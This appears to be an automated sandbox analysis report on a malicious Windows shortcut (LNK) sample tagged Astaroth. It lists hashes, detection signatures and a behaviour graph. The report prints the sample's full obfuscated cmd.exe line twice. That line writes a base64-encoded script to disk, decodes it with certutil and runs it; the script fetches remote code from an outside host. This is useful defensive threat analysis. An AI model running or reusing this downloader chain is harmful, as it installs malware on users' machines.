Windows Analysis Report
WNKpB6SXkg.lnk

Overview

General Information

Sample Name: WNKpB6SXkg.lnk
Analysis ID: 794218
MD5: dde2cf4cb9b483e8eb8a2d851deac816
SHA1: 2cb939abfa8fec5622662eb8cf0baa1544e0569f
SHA256: 76ee775c99099f8f68656e8a9eacf657720add7110ba7f72e65cc538f595be4e
Tags: AstarothBRAgeoGuildmalnk

Detection

Score: 52
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Windows shortcut file (LNK) starts blacklisted processes
Obfuscated command line found
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Program does not show much activity (idle)

Classification

Source: classification engine Classification label: mal52.winLNK@1/1@0/0

Data Obfuscation
barindex
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/D/c md C: 58H8S5\>nul 2>&1 &&s^eT RYED=C: 58H8S5\^E58H8S5.^jS&&echo dmFyIEM5ZWc9InNjIisiciI7RDllZz0iaXAiKyJ0OmgiO0U5ZWc9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDOWVnK0Q5ZWcrRTllZysiLy9lY2VpZTYuc2FvYnJhc3R1cmJpbGhhb2Nvc21lLmNvbS8/MS8iKTs=>!RYED!&&cErtUtil -f -dEco^de !RYED! !RYED!&&ca^ll !RYED!

Persistence and Installation Behavior
barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /v/d/c md c: 58h8s5\>nul 2>&1 &&s^et ryed=c: 58h8s5\^e58h8s5.^js&&echo dmfyiem5zwc9innjiisicii7rdllzz0iaxaikyj0omgio0u5zwc9ilqikyj0ucirijoio0dlde9iamvjdchdowvnk0q5zwcrrtllzysily9ly2vpztyuc2fvynjhc3r1cmjpbghhb2nvc21llmnvbs8/ms8ikts=>!ryed!&&certutil -f -deco^de !ryed! !ryed!&&ca^ll !ryed!
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 794218 Sample: WNKpB6SXkg.lnk Startdate: 30/01/2023 Architecture: WINDOWS Score: 52 7 Windows shortcut file (LNK) starts blacklisted processes 2->7 9 Obfuscated command line found 2->9 5 cmd.exe 2 2->5         started        process3
No contacted IP infos